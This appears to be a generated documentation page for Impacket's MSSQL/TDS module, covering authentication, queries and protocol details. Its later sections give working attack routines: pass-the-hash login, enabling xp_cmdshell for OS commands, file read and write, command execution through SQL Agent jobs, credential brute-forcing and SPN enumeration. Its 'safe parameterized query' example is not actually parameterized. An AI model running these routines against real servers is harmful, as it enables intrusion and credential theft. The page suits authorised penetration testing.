Skip to main content

MSSQL Protocol

Impacket’s TDS (Tabular Data Stream) implementation provides comprehensive support for connecting to and interacting with Microsoft SQL Server, including authentication, query execution, and advanced features.

Overview

The TDS protocol implementation is located in impacket/tds.py and includes:
  • Authentication - Windows authentication (NTLM/Kerberos), SQL authentication
  • Query execution - Execute SQL queries and stored procedures
  • Multiple result sets - Handle complex query results
  • Encryption - TLS encryption for secure connections

TDS Protocol

TDS (Tabular Data Stream) is Microsoft’s application-level protocol for SQL Server communication. Impacket implements TDS 7.0+ for compatibility with modern SQL Server versions.

Connection and Authentication

Basic Connection

From tds.py:1-100:
from impacket.tds import MSSQL

# Connect to SQL Server
ms_sql = MSSQL(
    address='192.168.1.10',
    port=1433
)

ms_sql.connect()
print("[+] Connected to SQL Server")

SQL Authentication

from impacket.tds import MSSQL

# SQL Server authentication
ms_sql = MSSQL('192.168.1.10', port=1433)
ms_sql.connect()

# Login with SQL credentials
ms_sql.login(
    database='master',
    username='sa',
    password='P@ssw0rd',
    domain='',
    hashes=''  # Leave empty for password auth
)

print("[+] Authenticated as sa")

Windows Authentication (NTLM)

from impacket.tds import MSSQL

# Windows authentication
ms_sql = MSSQL('192.168.1.10', port=1433)
ms_sql.connect()

# Login with domain credentials
ms_sql.login(
    database='master',
    username='jdoe',
    password='P@ssw0rd',
    domain='CORP',
    hashes=''  
)

print("[+] Authenticated as CORP\\jdoe")

# Or with NTLM hash (Pass-the-Hash)
ms_sql.login(
    database='master',
    username='jdoe',
    password='',
    domain='CORP',
    hashes='aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'
)

Kerberos Authentication

from impacket.tds import MSSQL

# Kerberos authentication
ms_sql = MSSQL('sql01.corp.local', port=1433)
ms_sql.connect()

ms_sql.kerberosLogin(
    database='master',
    username='jdoe',
    password='P@ssw0rd',
    domain='CORP.LOCAL',
    kdcHost='dc01.corp.local'
)

print("[+] Authenticated via Kerberos")

# With AES key
ms_sql.kerberosLogin(
    database='master',
    username='jdoe',
    password='',
    domain='CORP.LOCAL',
    aesKey='e5c4d39c...',
    kdcHost='dc01.corp.local'
)

Query Execution

Execute Query

from impacket.tds import MSSQL

ms_sql = MSSQL('192.168.1.10', port=1433)
ms_sql.connect()
ms_sql.login('master', 'sa', 'P@ssw0rd')

# Execute SELECT query
ms_sql.sql_query("SELECT @@VERSION")

# Get results
result = ms_sql.printReplies()
print(result)

# Disconnect
ms_sql.disconnect()

Multiple Queries

# Execute multiple statements
query = """
SELECT name, database_id FROM sys.databases;
SELECT name FROM sys.tables WHERE type = 'U';
"""

ms_sql.sql_query(query)
ms_sql.printReplies()

Parameterized Queries

# Safe parameterized query
query = "SELECT * FROM users WHERE username = ?"
ms_sql.sql_query(query)

# Note: Impacket's TDS implementation handles basic queries
# For complex parameterized queries, use RPC calls

Information Gathering

Enumerate Databases

def enum_databases(ms_sql):
    """
    List all databases
    """
    query = """
    SELECT 
        name,
        database_id,
        create_date,
        state_desc
    FROM sys.databases
    ORDER BY name
    """
    
    ms_sql.sql_query(query)
    return ms_sql.printReplies()

# Usage
ms_sql = MSSQL('192.168.1.10')
ms_sql.connect()
ms_sql.login('master', 'sa', 'P@ssw0rd')

print("[*] Databases:")
result = enum_databases(ms_sql)
print(result)

Enumerate Tables

def enum_tables(ms_sql, database='master'):
    """
    List all tables in database
    """
    query = f"""
    USE [{database}];
    SELECT 
        TABLE_SCHEMA,
        TABLE_NAME,
        TABLE_TYPE
    FROM INFORMATION_SCHEMA.TABLES
    WHERE TABLE_TYPE = 'BASE TABLE'
    ORDER BY TABLE_NAME
    """
    
    ms_sql.sql_query(query)
    return ms_sql.printReplies()

# Usage
print("[*] Tables in 'master':")
result = enum_tables(ms_sql, 'master')
print(result)

Enumerate Users and Logins

def enum_logins(ms_sql):
    """
    Enumerate SQL Server logins
    """
    query = """
    SELECT 
        name,
        type_desc,
        is_disabled,
        create_date,
        modify_date
    FROM sys.server_principals
    WHERE type IN ('S', 'U', 'G')
    ORDER BY name
    """
    
    ms_sql.sql_query(query)
    return ms_sql.printReplies()

def enum_database_users(ms_sql, database='master'):
    """
    Enumerate users in specific database
    """
    query = f"""
    USE [{database}];
    SELECT 
        name,
        type_desc,
        create_date,
        modify_date
    FROM sys.database_principals
    WHERE type IN ('S', 'U', 'G')
    ORDER BY name
    """
    
    ms_sql.sql_query(query)
    return ms_sql.printReplies()

Check Privileges

def check_privileges(ms_sql):
    """
    Check current user privileges
    """
    queries = {
        'Current User': "SELECT SYSTEM_USER, USER_NAME()",
        'Server Role': "SELECT IS_SRVROLEMEMBER('sysadmin')",
        'Public Role': "SELECT IS_SRVROLEMEMBER('public')",
        'Database Owner': "SELECT IS_MEMBER('db_owner')",
    }
    
    for name, query in queries.items():
        ms_sql.sql_query(query)
        result = ms_sql.printReplies()
        print(f"{name}: {result}")

# Check if sysadmin
ms_sql.sql_query("SELECT IS_SRVROLEMEMBER('sysadmin')")
result = ms_sql.printReplies()
if '1' in result:
    print("[+] Current user has sysadmin privileges!")
else:
    print("[-] Not a sysadmin")

Advanced Features

xp_cmdshell Execution

xp_cmdshell allows OS command execution and requires sysadmin privileges. Use responsibly and only on systems you’re authorized to test.
def enable_xp_cmdshell(ms_sql):
    """
    Enable xp_cmdshell (requires sysadmin)
    """
    queries = [
        "EXEC sp_configure 'show advanced options', 1",
        "RECONFIGURE",
        "EXEC sp_configure 'xp_cmdshell', 1",
        "RECONFIGURE"
    ]
    
    for query in queries:
        ms_sql.sql_query(query)
        ms_sql.printReplies()
    
    print("[+] xp_cmdshell enabled")

def exec_xp_cmdshell(ms_sql, command):
    """
    Execute OS command via xp_cmdshell
    """
    query = f"EXEC xp_cmdshell '{command}'"
    ms_sql.sql_query(query)
    return ms_sql.printReplies()

# Usage
ms_sql = MSSQL('192.168.1.10')
ms_sql.connect()
ms_sql.login('master', 'sa', 'P@ssw0rd')

enable_xp_cmdshell(ms_sql)
result = exec_xp_cmdshell(ms_sql, 'whoami')
print(f"Command output: {result}")

File Operations

def read_file(ms_sql, filepath):
    """
    Read file using OPENROWSET (requires BULK permissions)
    """
    query = f"""
    SELECT BulkColumn 
    FROM OPENROWSET(
        BULK '{filepath}',
        SINGLE_BLOB
    ) AS x
    """
    
    ms_sql.sql_query(query)
    return ms_sql.printReplies()

def write_file(ms_sql, filepath, content):
    """
    Write file using xp_cmdshell
    """
    # Escape single quotes
    content_escaped = content.replace("'", "''")
    
    command = f"echo {content_escaped} > {filepath}"
    query = f"EXEC xp_cmdshell '{command}'"
    
    ms_sql.sql_query(query)
    return ms_sql.printReplies()

# Read Windows hosts file
result = read_file(ms_sql, 'C:\\Windows\\System32\\drivers\\etc\\hosts')
print(result)

Linked Servers

def enum_linked_servers(ms_sql):
    """
    Enumerate linked servers
    """
    query = "EXEC sp_linkedservers"
    ms_sql.sql_query(query)
    return ms_sql.printReplies()

def query_linked_server(ms_sql, linked_server, query):
    """
    Execute query on linked server
    """
    full_query = f"EXEC('{query}') AT [{linked_server}]"
    ms_sql.sql_query(full_query)
    return ms_sql.printReplies()

# Usage
print("[*] Linked servers:")
linked = enum_linked_servers(ms_sql)
print(linked)

# Query linked server
result = query_linked_server(
    ms_sql,
    'LINKEDSRV',
    'SELECT @@VERSION'
)
print(result)

SQL Server Agent Jobs

def enum_agent_jobs(ms_sql):
    """
    Enumerate SQL Server Agent jobs
    """
    query = """
    SELECT 
        job_id,
        name,
        enabled,
        date_created,
        date_modified
    FROM msdb.dbo.sysjobs
    ORDER BY name
    """
    
    ms_sql.sql_query(query)
    return ms_sql.printReplies()

def create_agent_job(ms_sql, job_name, command):
    """
    Create SQL Agent job for command execution
    """
    queries = [
        f"USE msdb",
        f"EXEC dbo.sp_add_job @job_name = N'{job_name}'",
        f"""EXEC sp_add_jobstep 
            @job_name = N'{job_name}',
            @step_name = N'Execute',
            @subsystem = N'CMDEXEC',
            @command = N'{command}'""",
        f"EXEC sp_add_jobserver @job_name = N'{job_name}'",
        f"EXEC sp_start_job @job_name = N'{job_name}'"
    ]
    
    for query in queries:
        ms_sql.sql_query(query)
        ms_sql.printReplies()

TDS Protocol Details

Packet Types

From tds.py:117-127:
# TDS packet types
TDS_SQL_BATCH = 1          # SQL batch
TDS_PRE_TDS_LOGIN = 2      # Pre-login
TDS_RPC = 3                # RPC request
TDS_TABULAR = 4            # Tabular result  
TDS_ATTENTION = 6          # Attention (cancel)
TDS_BULK_LOAD_DATA = 7     # Bulk load
TDS_TRANSACTION = 14       # Transaction manager
TDS_LOGIN7 = 16            # TDS 7.0+ login
TDS_SSPI = 17              # SSPI message
TDS_PRE_LOGIN = 18         # Pre-login message

Encryption

TDS supports TLS encryption for secure communication. Encryption is negotiated during the pre-login phase.
from impacket.tds import MSSQL, TDS_ENCRYPT_ON, TDS_ENCRYPT_REQ

# Force encryption (from tds.py:136-139)
ms_sql = MSSQL('192.168.1.10', port=1433)
ms_sql.connect()

# Encryption negotiated automatically during login
# TDS_ENCRYPT_OFF = 0    # No encryption
# TDS_ENCRYPT_ON = 1     # Encryption on
# TDS_ENCRYPT_NOT_SUP = 2  # Not supported
# TDS_ENCRYPT_REQ = 3    # Required

Security Testing

Bruteforce Authentication

def bruteforce_sql_auth(target, usernames, passwords):
    """
    Attempt SQL authentication with username/password lists
    """
    for username in usernames:
        for password in passwords:
            try:
                ms_sql = MSSQL(target, port=1433)
                ms_sql.connect()
                ms_sql.login('master', username, password)
                
                print(f"[+] SUCCESS: {username}:{password}")
                ms_sql.disconnect()
                return (username, password)
                
            except Exception as e:
                print(f"[-] Failed: {username}:{password}")
                continue
    
    return None

# Usage
usernames = ['sa', 'admin', 'sqlserver']
passwords = ['', 'password', 'P@ssw0rd', 'admin']

creds = bruteforce_sql_auth('192.168.1.10', usernames, passwords)
if creds:
    print(f"\n[+] Valid credentials found: {creds[0]}:{creds[1]}")

Enumerate SPNs

def find_mssql_spns(ldap_conn, domain):
    """
    Find MSSQL SPNs in Active Directory
    """
    from impacket.ldap.ldapasn1 import SearchResultEntry
    
    ldap_filter = '(servicePrincipalName=MSSQLSvc/*)'
    attributes = ['servicePrincipalName', 'sAMAccountName', 'dNSHostName']
    
    ldap_conn.search(
        searchFilter=ldap_filter,
        attributes=attributes
    )
    
    mssql_servers = []
    for entry in ldap_conn.getResponseIterator():
        if isinstance(entry, SearchResultEntry):
            server = {}
            for attr in entry['attributes']:
                name = str(attr['type'])
                values = [str(val) for val in attr['vals']]
                server[name] = values
            mssql_servers.append(server)
    
    return mssql_servers

# Find all SQL Servers in domain
for server in find_mssql_spns(ldap_conn, 'CORP.LOCAL'):
    print(f"SQL Server: {server.get('dNSHostName', ['Unknown'])[0]}")
    for spn in server.get('servicePrincipalName', []):
        print(f"  - {spn}")

Error Handling

Always handle SQL exceptions properly to avoid crashes and information disclosure.
from impacket.tds import MSSQL, SQLErrorException

try:
    ms_sql = MSSQL('192.168.1.10', port=1433)
    ms_sql.connect()
    ms_sql.login('master', 'sa', 'wrong_password')
    
except SQLErrorException as e:
    print(f"SQL Error: {e}")
    
except Exception as e:
    print(f"Connection Error: {e}")
    
finally:
    if ms_sql:
        ms_sql.disconnect()

Complete Example: SQL Server Client

from impacket.tds import MSSQL
import sys

def sql_client(target, username, password, database='master', domain=''):
    """
    Interactive SQL Server client
    """
    ms_sql = MSSQL(target, port=1433)
    
    try:
        print(f"[*] Connecting to {target}:1433...")
        ms_sql.connect()
        
        print(f"[*] Authenticating as {username}...")
        ms_sql.login(
            database=database,
            username=username,
            password=password,
            domain=domain
        )
        
        print("[+] Authentication successful\n")
        
        # Get version
        ms_sql.sql_query("SELECT @@VERSION")
        version = ms_sql.printReplies()
        print(f"[*] SQL Server Version:\n{version}\n")
        
        # Check privileges  
        ms_sql.sql_query("SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin')")
        privs = ms_sql.printReplies()
        print(f"[*] Current User: {privs}\n")
        
        # List databases
        print("[*] Databases:")
        ms_sql.sql_query("SELECT name FROM sys.databases ORDER BY name")
        dbs = ms_sql.printReplies()
        print(dbs)
        
        # Interactive mode
        print("\n[*] Entering interactive mode (type 'exit' to quit)\n")
        while True:
            query = input("SQL> ")
            
            if query.lower() in ['exit', 'quit']:
                break
            
            if not query.strip():
                continue
            
            try:
                ms_sql.sql_query(query)
                result = ms_sql.printReplies()
                print(result)
            except Exception as e:
                print(f"Error: {e}")
        
    except Exception as e:
        print(f"[-] Error: {e}")
        return 1
        
    finally:
        ms_sql.disconnect()
        print("\n[*] Disconnected")
    
    return 0

if __name__ == '__main__':
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target> <username> <password> [domain]")
        sys.exit(1)
    
    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    domain = sys.argv[4] if len(sys.argv) > 4 else ''
    
    sys.exit(sql_client(target, username, password, domain=domain))

Port Discovery

SQL Server Browser (UDP 1434)

From tds.py:70-76:
import socket
from impacket.tds import SQLR_CLNT_UCAST_INST, SQLR_Response

def query_sql_browser(target, instance=''):
    """
    Query SQL Server Browser service for instances
    """
    # SQL Browser port
    SQLR_PORT = 1434
    
    # Create request
    request = SQLR_CLNT_UCAST_INST()
    request['Instance'] = instance.encode() + b'\x00'
    
    # Send UDP request
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(5)
    sock.sendto(request.getData(), (target, SQLR_PORT))
    
    # Receive response
    data, _ = sock.recvfrom(4096)
    sock.close()
    
    # Parse response
    response = SQLR_Response(data)
    return response['Data'].decode()

# Discover SQL instances
instances = query_sql_browser('192.168.1.10')
print(f"SQL Instances:\n{instances}")
  • Kerberos - Kerberos authentication for SQL
  • LDAP - Finding SQL Servers in AD

References

  • Source: impacket/tds.py
  • [MS-TDS]: Tabular Data Stream Protocol
  • [MC-SQLR]: SQL Server Resolution Protocol

Build docs developers (and LLMs) love